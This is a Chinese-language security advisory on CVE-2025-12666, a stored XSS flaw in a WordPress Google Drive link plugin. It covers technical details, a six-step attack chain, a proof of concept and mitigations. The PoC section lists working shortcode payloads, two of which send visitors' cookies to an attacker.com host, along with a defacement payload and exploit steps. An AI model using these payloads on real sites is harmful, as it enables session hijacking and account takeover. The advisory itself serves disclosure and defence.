CVE-2025-12666 WordPress Google Drive插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12666

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Google Drive upload and download link plugin for WordPress

漏洞概述

CVE-2025-12666是WordPress平台上一款Google Drive上传和下载链接插件存在的安全漏洞。该插件用于在WordPress网站中集成Google Drive文件的上传和下载功能。由于插件在处理短代码(atachfilegoogle)中的link参数时，缺少充分的输入清理和输出转义，导致存在存储型跨站脚本攻击(SStored XSS)漏洞。攻击者利用此漏洞可以注入任意JavaScript代码到网页中。当其他用户访问包含恶意代码的页面时，注入的脚本将自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等严重后果。由于该漏洞为存储型，只要恶意代码被写入数据库，即使管理员修复漏洞后，恶意脚本仍可能持续存在。此漏洞需要认证才能利用，但只需要Contributor级别(贡献者)的低权限账户即可实施攻击，大大降低了攻击门槛。

技术细节

该漏洞的根本原因在于插件对用户输入的'link'参数缺乏有效过滤。攻击者通过'atachfilegoogle'短代码传入恶意构造的JavaScript脚本，插件直接将此输入存储到数据库中，并在后续页面渲染时未进行输出转义就直接显示。具体技术细节如下：1) 漏洞位于pickergoogledirve.php第27行附近，处理短代码属性的代码直接使用用户输入而未进行sanitize；2) 攻击者构造形如[atachfilegoogle link='"><script>alert(document.cookie)</script>']的短代码即可注入脚本；3) 当页面加载时，浏览器将恶意脚本作为正常HTML/JS解析执行；4) 由于是存储型XSS，攻击效果持久且影响所有访问该页面的用户；5) 利用条件低，只需WordPress Contributor角色权限即可发表文章/页面并插入短代码。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的WordPress版本及是否安装存在漏洞的Google Drive upload and download link插件(版本<=1.0)

STEP 2

获取访问权限

攻击者获取WordPress Contributor级别账户，可通过社会工程学、密码爆破或内部人员协作等方式获得账户凭据

STEP 3

构造恶意Payload

攻击者构造包含恶意JavaScript代码的短代码，如[atachfilegoogle link='"><script>alert(1)</script>']

STEP 4

注入恶意代码

在文章或页面内容中插入恶意短代码，提交发布后恶意脚本被存储到WordPress数据库中

STEP 5

触发执行

当其他用户(管理员、访客等)访问包含恶意代码的页面时，浏览器解析页面并执行注入的JavaScript脚本

STEP 6

造成危害

攻击者可通过窃取Cookie/Session冒充用户身份、劫持用户会话、窃取敏感信息或进行进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12666 PoC - Stored XSS via atachfilegoogle shortcode -->
<!-- Requires Contributor-level access or higher in WordPress -->

<!-- Method 1: Basic XSS injection -->
[atachfilegoogle link='"><script>alert("XSS")</script>']

<!-- Method 2: Cookie stealing payload -->
[atachfilegoogle link='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>']

<!-- Method 3: Session hijacking with img tag -->
[atachfilegoogle link='"><img src=x onerror="this.src='https://attacker.com/log?cookie='+document.cookie">']

<!-- Method 4: Defacement payload -->
[atachfilegoogle link='"><script>document.body.innerHTML='<h1>Hacked</h1>'</script>']

<!-- Exploit steps:
1. Login to WordPress with Contributor account
2. Create/Edit a post or page
3. Insert the malicious shortcode in content
4. Publish or submit for review
5. When any user views the page, XSS payload executes
-->

影响范围

Google Drive upload and download link plugin for WordPress <= 1.0

防御指南

临时缓解措施

立即采取以下临时缓解措施：1) 如果暂无法升级插件，可临时禁用Google Drive upload and download link插件；2) 审查所有使用atachfilegoogle短代码的文章和页面，移除可疑内容；3) 限制新用户注册为Contributor角色；4) 启用双因素认证增强管理员账户安全；5) 检查网站服务器访问日志，排查是否存在异常请求；6) 使用Wordfence等安全插件进行深度扫描，检测是否存在已注入的恶意代码。